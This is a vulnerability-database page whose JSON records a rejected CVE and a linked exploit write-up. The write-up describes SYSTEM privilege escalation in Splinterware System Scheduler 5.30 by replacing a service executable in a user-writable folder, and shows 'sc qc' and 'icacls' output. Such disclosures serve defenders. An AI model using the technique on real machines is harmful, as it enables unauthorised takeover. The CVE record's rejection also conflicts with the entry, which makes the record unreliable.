DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2021-31771", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-31771", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", "published": "2021-07-06T14:15:00", "modified": "2022-07-12T17:42:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31771", "reporter": "cve@mitre.org", "references": [], "cvelist": ["CVE-2021-31771"], "immutableFields": [], "lastseen": "2022-07-13T16:16:52", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-36228"]}], "rev": 4}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-36228"]}]}, "exploitation": null, "vulnersScore": -0.2}, "_state": {"dependencies": 1659909890, "score": 1659846169, "epss": 1679098904}, "_internal": {"score_hash": "7336fdeb6fc872d0af3b6cdae7d3b671"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-732"], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [], "product_info": []}

{"zdt": [{"lastseen": "2022-06-24T15:39:48", "description": "", "cvss3": {}, "published": "2021-05-12T00:00:00", "type": "zdt", "title": "Splinterware System Scheduler Professional 5.30 - Unquoted Service Path Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31771"], "modified": "2021-05-12T00:00:00", "id": "1337DAY-ID-36228", "href": "https://0day.today/exploit/description/36228", "sourceData": "# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path\n# Exploit Author: Andrea Intilangelo\n# Vendor Homepage: https://www.splinterware.com\n# Software Link: https://www.splinterware.com/download/ssproeval.exe\n# Version: 5.30 Professional\n# Tested on: Windows 10 Pro 20H2 x64\n\nSystem Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting\nwhere the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with\nelevated privileges (system level privileges as \"nt authority\\system\") since the service runs as Local System;\nrenaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one\nwill be executed after a short while.\n\nC:\\Users\\test>sc qc WindowsScheduler\n[SC] QueryServiceConfig OPERAZIONI RIUSCITE\n\nNOME_SERVIZIO: WindowsScheduler\n TIPO : 10 WIN32_OWN_PROCESS\n TIPO_AVVIO : 2 AUTO_START\n CONTROLLO_ERRORE : 0 IGNORE\n NOME_PERCORSO_BINARIO : C:\\PROGRA~2\\SYSTEM~1\\WService.exe\n GRUPPO_ORDINE_CARICAMENTO :\n TAG : 0\n NOME_VISUALIZZATO : System Scheduler Service\n DIPENDENZE :\n SERVICE_START_NAME : LocalSystem\n\nC:\\Users\\test>icacls C:\\PROGRA~2\\SYSTEM~1\\\nC:\\PROGRA~2\\SYSTEM~1\\ BUILTIN\\Users:(RX,W)\n BUILTIN\\Users:(OI)(CI)(IO)(GR,GW,GE)\n NT SERVICE\\TrustedInstaller:(I)(F)\n NT SERVICE\\TrustedInstaller:(I)(CI)(IO)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Administrators:(I)(F)\n BUILTIN\\Administrators:(I)(OI)(CI)(IO)(F)\n BUILTIN\\Users:(I)(RX)\n BUILTIN\\Users:(I)(OI)(CI)(IO)(GR,GE)\n CREATOR OWNER:(I)(OI)(CI)(IO)(F)\n AUTORIT\u00c0 PACCHETTI APPLICAZIONI\\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)\n AUTORIT\u00c0 PACCHETTI APPLICAZIONI\\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)\n AUTORIT\u00c0 PACCHETTI APPLICAZIONI\\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)\n AUTORIT\u00c0 PACCHETTI APPLICAZIONI\\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)\n\nElaborazione completata per 1 file. Elaborazione non riuscita per 0 file\n\nC:\\Users\\test>\n", "sourceHref": "https://0day.today/exploit/36228", "cvss": {"score": 0.0, "vector": "NONE"}}]}